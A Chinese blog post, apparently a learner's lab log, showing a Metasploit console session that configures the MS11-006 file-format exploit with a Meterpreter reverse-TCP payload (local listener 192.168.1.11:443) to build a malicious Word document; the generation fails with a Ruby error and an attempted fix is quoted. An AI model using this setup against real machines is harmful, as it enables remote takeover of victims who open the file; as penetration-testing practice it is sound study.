metasploit文件格式漏洞渗透攻击(失败)
来源:互联网 发布:淘宝抢现货技巧 编辑:程序博客网 时间:2024/03/29 17:48
root@bt:~# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|`.""'. II 6. .P : .' / | `. : II 'T;. .;P' '.' / | `.' II 'T; ;P' `. / | .'IIIIII 'YvP' `-.__|__.-'I love shells --egypt =[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --=[ 927 exploits - 499 auxiliary - 151 post+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf > use windows/fileformat/ms11_006_createsizeddibsectionmsf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11LHOST => 192.168.1.11msf exploit(ms11_006_createsizeddibsection) > set LPORT 443LPORT => 443msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/metasploit/msf3/data/exploits/OUTPUTPATH => /opt/metasploit/msf3/data/exploits/msf exploit(ms11_006_createsizeddibsection) > show optionsModule options (exploit/windows/fileformat/ms11_006_createsizeddibsection): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.doc yes The file name. OUTPUTPATH /opt/metasploit/msf3/data/exploits/ yes The output path to use.Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique: seh, thread, process, none LHOST 192.168.1.11 yes The listen address LPORT 443 yes The listen portExploit target: Id Name -- ---- 0 Automaticmsf exploit(ms11_006_createsizeddibsection) > exploit[*] Creating 'msf.doc' file ...[-] Exploit failed: NameError uninitialized constant Rex::OLEmsf exploit(ms11_006_createsizeddibsection) >
失败了。谷歌了一下,找到参考答案:
Open /opt/metasploit/apps/pro/msf3/modules/exploits/windows/fileformat/ms11_006_creat esizeddibsection.rb in any text editor and include the following two lines at the top of the page where you will see:require 'msf/core' Add:require 'rex/ole'require 'rex/ole/util' All in all, you should have three require statements now:require 'msf/core'require 'rex/ole'require 'rex/ole/util'https://community.rapid7.com/message/7864#7864
自己修改了一下那个文件,重启msfconsole,还是不行。
环境是BT5R3。
- metasploit文件格式漏洞渗透攻击(失败)
- metasploit文件格式漏洞渗透攻击(成功生成doc)
- metasploit文件格式漏洞渗透攻击(成功获得shell)
- 利用metasploit通过ms_08_067_netapi漏洞渗透winXp
- Metasploit渗透Ubuntu 12.04攻击测试演练
- 使用metasploit进行渗透攻击步骤
- 渗透测试漏洞利用之漏洞攻击
- metasploit针对性钓鱼攻击向量(BT5R1失败)
- metasploit针对性钓鱼攻击向量(BT5R3失败)
- metasploit 渗透测试(ftp)
- metasploit对IE浏览器的极光漏洞进行渗透利用
- Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
- Metasploit渗透
- 《Metasploit 魔鬼训练营》05 网络服务渗透攻击
- 《Metasploit 魔鬼训练营》06 客户端渗透攻击
- metasploit渗透测试(一)在 Mac 安装 Metasploit-framework
- 《metasploit渗透测试魔鬼训练营》学习笔记第五章--网络服务渗透攻击
- metasploit渗透测试学习笔记(一)
- 问题一百三十六:三角形类问题
- Android 文件保存与读取
- LMT与DMT
- Eclipse+QT+python+pydev开发
- 求数组中的最大子序列的值最优算法
- metasploit文件格式漏洞渗透攻击(失败)
- MySQL索引背后的数据结构及算法原理
- 乐观锁和悲观锁
- css
- socket编程初学及原理
- Linux批量替换某种类型文件中的字符串-sed和grep命令使用
- centos搭建python开发环境
- C++头文件----<cstdio>(stdio.h)
- zigbee 任务调度机制